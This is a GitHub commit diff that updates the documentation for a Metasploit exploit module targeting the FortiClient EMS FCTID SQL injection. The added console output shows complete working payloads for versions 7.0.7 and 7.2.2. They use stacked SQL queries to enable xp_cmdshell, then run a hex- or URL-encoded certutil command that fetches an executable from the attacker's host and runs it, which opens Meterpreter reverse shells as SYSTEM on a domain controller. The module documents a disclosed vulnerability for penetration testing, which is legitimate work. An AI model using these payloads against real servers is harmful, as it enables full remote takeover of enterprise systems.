Skip to content

Commit 48c69b9

Browse files
dledda-r7dledda-r7
committed
Land rapid7#19344, FortiClient EMS FCTID SQLi to RCE fix for 7.2.x
2 parents 4b8e2b6 + 2ffe027 commit 48c69b9

File tree

2 files changed

+302
-100
lines changed

2 files changed

+302
-100
lines changed

documentation/modules/exploit/windows/http/forticlient_ems_fctid_sqli.md

Lines changed: 139 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -71,7 +71,7 @@ and download and install the .msi package. Once installed correctly you should s
7171
1. Receive a Meterpreter session running in the context of `NT AUTHORITY\SYSTEM`
7272

7373
## Scenarios
74-
### FortiClient EMS 7.07.0398_x64 running on Windows Server 2019 (Domain Controller)
74+
### FortiClientEndpointManagementServer_7.0.7.0398_x64.exe running on Windows Server 2019 (Domain Controller)
7575
```
7676
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
7777
rhosts => 172.16.199.200
@@ -101,7 +101,7 @@ Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
101101
FETCH_URIPATH no Local URI to use for serving payload
102102
FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces.
103103
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
104-
LPORT 8383 yes The listen port
104+
LPORT 4444 yes The listen port
105105
106106
107107
Exploit target:
@@ -114,32 +114,156 @@ Exploit target:
114114
115115
View the full module info with the info, or info -d command.
116116
117-
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) >
117+
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set verbose true
118+
verbose => true
118119
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > run
119120
[*] Reloading module...
120121
121-
[*] Started reverse TCP handler on 172.16.199.1:8383
122+
[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\pzGnmDqDGUOb.exe & start /B %TEMP%\pzGnmDqDGUOb.exe
123+
[*] Fetch handler listening on 172.16.199.1:8080
124+
[*] HTTP server started
125+
[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
126+
[*] Started reverse TCP handler on 172.16.199.1:4444
122127
[*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
123-
[+] 172.16.199.200:8013 - The target is vulnerable. The SQLi has been exploited successfully
124-
[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;-- was executed successfully
125-
[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
126-
[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;-- was executed successfully
127-
[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
128+
[*] 172.16.199.200:8013 - Sending the following message:
129+
MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD
130+
SIZE= 124
131+
X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|
132+
X-FCCK-PROBE-END
133+
134+
135+
[*] 172.16.199.200:8013 - The response received was: FCPROBERPLY: FGT|FCTEMS0000125975:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7000007|
136+
137+
[+] 172.16.199.200:8013 - The target appears to be vulnerable. Version detected: 7.0.7
138+
[*] 172.16.199.200:8013 - Returning SYSINFO for 7.0 target
139+
[*] 172.16.199.200:8013 - Sending the following message:
140+
MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; DECLARE @SQL VARCHAR(128) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f2d4c486f5943323263636566425a614c466368434551202554454d50255c707a476e6d44714447554f622e6578652026207374617274202f42202554454d50255c707a476e6d44714447554f622e657865); exec master.dbo.xp_cmdshell @sql;--
141+
SIZE= 1900
142+
143+
X-FCCK-REGISTER: SYSINFO||QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjA4NzkKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREVMPVZNd2FyZSBWaXJ0dWFsIFBsYXRmb3JtClJTRU5HX1ZFUj0xLjAwMDIwCkFWX1BST1RFQ1RFRD0wCkFWQUxFTkdfVkVSPTAuMDAwMDAKUEVFUl9JUD0KRU5BQkxFRF9GRUFUVVJFX0JJVE1BUD00OQpFUF9PRkZORVRDSEtTVU09MApJTlNUQUxMRURfRkVBVFVSRV9CSVRNQVA9MTU4NTgzCkVQX0NIS1NVTT0wCkhJRERFTl9GRUFUVVJFX0JJVE1BUD0xNTU5NDMKRElTS0VOQz0KSE9TVE5BTUU9Q1lCRVItUkVUUUIxRkxQCkFWX1BST0RVQ1Q9CkZDVF9TTj1GQ1Q4MDAxNjM4ODQ4NjUxCklOU1RBTExVSUQ9QjRGNDQ1MEQtMTA4NS00RUIyLTkzMzItRkNCMDVFNzExRDE3Ck5XSUZTPUV0aGVybmV0MHwyMC4xNTQuOS40fGM0OmZjOjEyOmIzOjI3OmVmfDIxOS4xMDIuMzYuMjIwfGExOjhjOmJjOjBjOjJmOmE5fDF8KnwwClVUQz0xNzEwMjcxNzc0ClBDX0RPTUFJTj0KQ09NX01BTj1WTXdhcmUsIEluYy4KQ1BVPUludGVsKFIpIFhlb24oUikgU2lsdmVyIDQyMTUgQ1BVIEAgMi41MEdIegpNRU09MTIyODcKSEREPTk5CkNPTV9TTj1WTXdhcmUtNDIgMDQgZWQgMmQgNjQgZTggMGIgMTQtNDUgZTkgZTQgZjYgNWEgYzcgNjcgODIKRE9NQUlOPQpXT1JLR1JPVVA9V09SS0dST1VQClVTRVJfU0lEPVMtMS01LTIxLTMwLTUwLTAtNTAwCkdST1VQX1RBRz0KQURHVUlEPQpFUF9GR1RDSEtTVU09MApFUF9SVUxFQ0hLU1VNPTAKV0ZfRklMRVNDSEtTVU09MApFUF9BUFBDVFJMQ0hLU1VNPTAK
144+
145+
X-FCCK-REGISTER-END
146+
147+
148+
[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
149+
[*] Sending payload to 172.16.199.200 (Microsoft-CryptoAPI/10.0)
150+
[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
151+
[*] Sending payload to 172.16.199.200 (CertUtil URL Agent)
152+
[*] Sending stage (201798 bytes) to 172.16.199.200
153+
[*] 172.16.199.200:8013 - The response received was:
154+
[+] 172.16.199.200:8013 - The SQLi: ';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; DECLARE @SQL VARCHAR(128) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f2d4c486f5943323263636566425a614c466368434551202554454d50255c707a476e6d44714447554f622e6578652026207374617274202f42202554454d50255c707a476e6d44714447554f622e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully
155+
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.200:50409) at 2024-07-24 09:35:07 -0700
156+
157+
meterpreter > getuid
158+
Server username: NT AUTHORITY\SYSTEM
159+
meterpreter > sysinfo
160+
Computer : DC2
161+
OS : Windows Server 2019 (10.0 Build 17763).
162+
Architecture : x64
163+
System Language : en_US
164+
Domain : KERBEROS
165+
Logged On Users : 9
166+
Meterpreter : x64/windows
167+
meterpreter >
168+
```
169+
170+
### FortiClientEndpointManagementServer_7.2.2.0879_x64.exe running on Windows Server 2019 (Domain Controller)
171+
```
172+
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
173+
rhosts => 172.16.199.200
174+
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set lhost 172.16.199.1
175+
lhost => 172.16.199.1
176+
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set verbose true
177+
verbose => true
178+
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > options
179+
180+
Module options (exploit/windows/http/forticlient_ems_fctid_sqli):
181+
182+
Name Current Setting Required Description
183+
---- --------------- -------- -----------
184+
RHOSTS 172.16.199.200 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
185+
RPORT 8013 yes The target port (TCP)
186+
VHOST no HTTP server virtual host
187+
188+
189+
Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
190+
191+
Name Current Setting Required Description
192+
---- --------------- -------- -----------
193+
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
194+
FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
195+
FETCH_DELETE false yes Attempt to delete the binary after execution
196+
FETCH_FILENAME rixdOwaGgW no Name to use on remote system when storing payload; cannot contain spaces or slashes
197+
FETCH_SRVHOST no Local IP to use for serving payload
198+
FETCH_SRVPORT 8080 yes Local port to use for serving payload
199+
FETCH_URIPATH no Local URI to use for serving payload
200+
FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces.
201+
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
202+
LPORT 4444 yes The listen port
203+
204+
205+
Exploit target:
206+
207+
Id Name
208+
-- ----
209+
0 Automatic Target
210+
211+
212+
213+
View the full module info with the info, or info -d command.
214+
215+
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > run
216+
217+
[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\xqUdZSzoE.exe & start /B %TEMP%\xqUdZSzoE.exe
218+
[*] Fetch handler listening on 172.16.199.1:8080
219+
[*] HTTP server started
220+
[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
221+
[*] Started reverse TCP handler on 172.16.199.1:4444
222+
[*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
223+
[*] 172.16.199.200:8013 - Sending the following message:
224+
MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD
225+
SIZE= 124
226+
X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|
227+
X-FCCK-PROBE-END
228+
229+
230+
[*] 172.16.199.200:8013 - The response received was: FCPROBERPLY: FGT|FCTEMS0000127184:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7002002|PROTO_VERSION|1.0.0|PERCON|1|
231+
232+
[+] 172.16.199.200:8013 - The target appears to be vulnerable. Version detected: 7.2.2
233+
[*] 172.16.199.200:8013 - Returning SYSINFO for 7.2 target
234+
[*] 172.16.199.200:8013 - Sending the following message:
235+
MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND ""Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%63%65%72%74%75%74%69%6C%20%2D%75%72%6C%63%61%63%68%65%20%2D%66%20%68%74%74%70%3A%2F%2F%31%37%32%2E%31%36%2E%31%39%39%2E%31%3A%38%30%38%30%2F%2D%4C%48%6F%59%43%32%32%63%63%65%66%42%5A%61%4C%46%63%68%43%45%51%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65%20%26%20%73%74%61%72%74%20%2F%42%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65"""))""';--
236+
IP=172.16.199.151
237+
MAC=00-0c-29-51-f7-4d
238+
FCT_ONNET=0
239+
CAPS=131071
240+
VDOM=Default
241+
EC_QUARANTINED=0
242+
SIZE= 2259
243+
244+
X-FCCK-REGISTER:SYSINFO|RkNUT1M9V0lONjQKT1NWRVI9TWljcm9zb2Z0IFdpbmRvd3MgMTAgUHJvZmVzc2lvbmFsIEVkaXRpb24sIDY0LWJpdCAoYnVpbGQgMTkwNDUpClJTRU5HX1ZFUj0xLjAwMTgyCkNPTV9NT0RFTD1WTXdhcmU3LDEKQVZTSUdfVkVSPTEuMDAwMDAKVVRDPTE3MjE3NTY2MjYKUENfRE9NQUlOPWtlcmJlcm9zLmlzc3VlCkNPTV9NQU49Vk13YXJlLCBJbmMuCkNQVT1JbnRlbChSKSBDb3JlKFRNKSBpNy05NzUwSCBDUFUgQCAyLjYwR0h6CkNPTV9TTj1WTXdhcmUtNTYgNGQgOGEgZDUgN2IgMzkgM2IgMGQtMzMgYzYgMjUgNmEgZTQgNTEgZjcgNGQKREhDUF9TRVJWRVI9Tm9uZQpGQ1RWRVI9Ny4yLjIuMDg2NApFUF9PTk5FVENIS1NVTT0wCkFWRU5HX1ZFUj02LjAwMjg3CkFQUFNJR19WRVI9MjguMDA4MzEKVVNFUj1tc2Z1c2VyCkFQUEVOR19WRVI9NC4wMDA4MgpWVUxTSUdfVkVSPTEuMDA3MDgKQVZBTFNJR19WRVI9MC4wMDAwMApWVUxFTkdfVkVSPTIuMDAwMzcKQVZfUFJPVEVDVEVEPTEKQVZBTEVOR19WRVI9MC4wMDAwMApQRUVSX0lQPTE2Mi4xNTYuNTguMTk5CkVOQUJMRURfRkVBVFVSRV9CSVRNQVA9MTYKRVBfT0ZGTkVUQ0hLU1VNPTAKSU5TVEFMTEVEX0ZFQVRVUkVfQklUTUFQPTQyMDcyNwpFUF9DSEtTVU09MApISURERU5fRkVBVFVSRV9CSVRNQVA9NDE4MDg3CkdST1VQX1RBRz0KRU5BQkxFRF9BUFBTPTAKSU5TVEFMTEVEX0FQUFM9MApESVNLRU5DPQpIT1NUTkFNRT1jbGllbnQKQVZfUFJPRFVDVD1NaWNyb3NvZnQgRGVmZW5kZXIgQW50aXZpcnVzCkZDVF9TTj1GQ1Q4MDAzMTczNjg5NzMwCklOU1RBTExVSUQ9RjQxNkU5QjctQzAxQy00M0RFLTk1RjEtMkJGQ0FEOTAzNTFECk5XSUZTPUV0aGVybmV0MHwxNzIuMTYuMTk5LjE1MXwwMC0wYy0yOS01MS1mNy00ZHwxNzIuMTYuMTk5LjJ8MDAtNTAtNTYtZTgtMDgtNmF8MXwqfDAKTUVNPTE2MzgzCkhERD0xMTkKRE9NQUlOPQpXT1JLR1JPVVA9ClVTRVJfU0lEPVMtMS01LTIxLTE3NjAyNTQxOTEtMzcyMzY0MzQyLTMyNDQ0NTM2ODctMTAwMApBREdVSUQ9CkVQX0ZHVENIS1NVTT0wCkVQX1JVTEVDSEtTVU09MApXRl9GSUxFU0NIS1NVTT0wCkVQX0FQUENUUkxDSEtTVU09MAo=|
245+
246+
X-FCCK-REGISTER-END
247+
248+
249+
[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
250+
[*] Sending payload to 172.16.199.200 (Microsoft-CryptoAPI/10.0)
251+
[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
252+
[*] Sending payload to 172.16.199.200 (CertUtil URL Agent)
128253
[*] Sending stage (201798 bytes) to 172.16.199.200
129-
[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; DECLARE @SQL VARCHAR(120) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75
130-
726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f7a524b42764743776d624662474c46336c4e6f486d772025
131-
54454d50255c6a744d45695362632e6578652026207374617274202f42202554454d50255c6a744d45695362632e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully
132-
[*] Meterpreter session 8 opened (172.16.199.1:8383 -> 172.16.199.200:57847) at 2024-04-11 14:00:22 -0700
254+
[*] 172.16.199.200:8013 - The response received was:
255+
[+] 172.16.199.200:8013 - The SQLi: ';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND ""Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%63%65%72%74%75%74%69%6C%20%2D%75%72%6C%63%61%63%68%65%20%2D%66%20%68%74%74%70%3A%2F%2F%31%37%32%2E%31%36%2E%31%39%39%2E%31%3A%38%30%38%30%2F%2D%4C%48%6F%59%43%32%32%63%63%65%66%42%5A%61%4C%46%63%68%43%45%51%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65%20%26%20%73%74%61%72%74%20%2F%42%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65"""))""';-- was executed successfully
256+
[*] Meterpreter session 4 opened (172.16.199.1:4444 -> 172.16.199.200:28146) at 2024-07-23 16:17:56 -0700
133257
134258
meterpreter > getuid
135-
syServer username: NT AUTHORITY\SYSTEM
259+
Server username: NT AUTHORITY\SYSTEM
136260
meterpreter > sysinfo
137261
Computer : DC2
138262
OS : Windows Server 2019 (10.0 Build 17763).
139263
Architecture : x64
140264
System Language : en_US
141265
Domain : KERBEROS
142-
Logged On Users : 16
266+
Logged On Users : 9
143267
Meterpreter : x64/windows
144268
meterpreter >
145269
```

0 commit comments

Comments
 (0)